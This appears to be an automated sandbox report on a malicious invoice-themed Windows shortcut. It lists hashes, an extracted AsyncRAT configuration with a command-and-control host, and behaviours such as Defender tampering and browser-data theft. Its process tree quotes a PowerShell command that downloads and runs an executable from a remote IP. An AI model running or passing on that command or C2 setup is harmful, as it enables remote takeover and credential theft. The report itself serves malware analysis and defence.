Analysis
-
max time kernel
141s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
resource tags
-
submitted
19-07-2022 14:46
General
-
Target
FACTURE_.lnk
-
Size
1012B
-
MD5
60cddf458ccce0249bc3654f282f7b2e
-
SHA1
19a6ab379f925509d7cc36524c716877f4a268a0
-
SHA256
b0cf721309f7ea1684e2593a3e3c98f080146274432f39c9e2d2982ba1c9da95
-
SHA512
cd86c8e423ad3eaad92e67241896976c5e02ecea5d0c2dafef08e17eb6786fae0682d5bd0e59897b06faf06a3cef4a3883c03331c450574ae753bba6477bda91
Malware Config
Extracted
asyncrat
0.5.7B
Default
secureyourdataarea1.duckdns.org:56390
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
false
-
install_file
svchost.exe
-
install_folder
%AppData%
Signatures
-
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
-
Detect Neshta payload 2 IoCs
-
Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
-
Modifies system executable filetype association 2 TTPs 1 IoCs
-
Neshta
Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.
-
Async RAT payload 1 IoCs
-
Blocklisted process makes network request 1 IoCs
-
Downloads MZ/PE file
-
Executes dropped EXE 3 IoCs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 2 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry class 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of WriteProcessMemory 19 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\FACTURE_.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-WebRequest -Uri 'http://52.149.215.0/svchost.exe' -OutFile $env:temp\file.exe; set a=ec; start $env:temp\file.exe2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"3⤵
- Modifies system executable filetype association
- Executes dropped EXE
- Checks computer location settings
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\3582-490\file.exe"C:\Users\Admin\AppData\Local\Temp\3582-490\file.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\3582-490\file.exe05⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5d5a6408e58a8e6cdcac441b2724bdeea
SHA1c32347262903a5db5422c41c280fe975731155a1
SHA2566927aa1bd6f5b470b786b77ac7deac1ac4afcfa7650bc5c72358b3e8462e32d3
SHA512f630fa6616ed5aeb1c875f1573de5ca3db917ff6b2d5cb8d3da37ae9e45104a8ebf46b2504d1281b9d3b6705bbf3422c9b40c20b64417ef932c68b314e3aee14
-
Filesize
438KB
MD561f89c90f92b2579d100f2af29f8375b
SHA194b645443699532b764963a6340dc2001de78146
SHA256531a2ee7e49f863969f2e353cfc0d62117d4857c9cf3784fa387c72a9911b757
SHA512fadb57106257333e6e34de9f7a47ca99b1aa628ddb4d973b088a66e3d7d7dda339a680204671bedf96aab68adaeb3797f82c06743dd550eb71d3f850e4214715
-
Filesize
438KB
MD561f89c90f92b2579d100f2af29f8375b
SHA194b645443699532b764963a6340dc2001de78146
SHA256531a2ee7e49f863969f2e353cfc0d62117d4857c9cf3784fa387c72a9911b757
SHA512fadb57106257333e6e34de9f7a47ca99b1aa628ddb4d973b088a66e3d7d7dda339a680204671bedf96aab68adaeb3797f82c06743dd550eb71d3f850e4214715
-
Filesize
438KB
MD561f89c90f92b2579d100f2af29f8375b
SHA194b645443699532b764963a6340dc2001de78146
SHA256531a2ee7e49f863969f2e353cfc0d62117d4857c9cf3784fa387c72a9911b757
SHA512fadb57106257333e6e34de9f7a47ca99b1aa628ddb4d973b088a66e3d7d7dda339a680204671bedf96aab68adaeb3797f82c06743dd550eb71d3f850e4214715
-
Filesize
479KB
MD54c6b01344809054252095695fe24aa5f
SHA1d1571b19723ebb0def5a71b7d977ef4c5bdb66ab
SHA256b20bdd03ad605edafccbed9cbf281d1fd370116dd07e335fc2f428e9efb2863b
SHA512a26600e8233e90034a3a731246bdc634bc30478ea995c37317ef2e8139200f09446c4b78b500ffec5d7a84045790d0e80d20e4ba58cf28f0e4358f80e1db3af0
-
Filesize
479KB
MD54c6b01344809054252095695fe24aa5f
SHA1d1571b19723ebb0def5a71b7d977ef4c5bdb66ab
SHA256b20bdd03ad605edafccbed9cbf281d1fd370116dd07e335fc2f428e9efb2863b
SHA512a26600e8233e90034a3a731246bdc634bc30478ea995c37317ef2e8139200f09446c4b78b500ffec5d7a84045790d0e80d20e4ba58cf28f0e4358f80e1db3af0
-
Filesize
120KB
-
Filesize
408KB
-
Filesize
472KB
-
-
Filesize
72KB
-
Filesize
5.6MB
-
Filesize
10.8MB
-
Filesize
136KB
-
-
Filesize
10.8MB
-
Filesize
6.2MB
-
Filesize
6.5MB
-
Filesize
32KB
-
-
Filesize
216KB
-
Filesize
104KB
-
Filesize
136KB
-
Filesize
408KB
-
Filesize
56KB
-
Filesize
120KB
-
Filesize
200KB
-
Filesize
304KB
-
Filesize
120KB
-
Filesize
600KB
-
Filesize
104KB
-
Filesize
40KB
-
-
Filesize
624KB
-
-
Filesize
464KB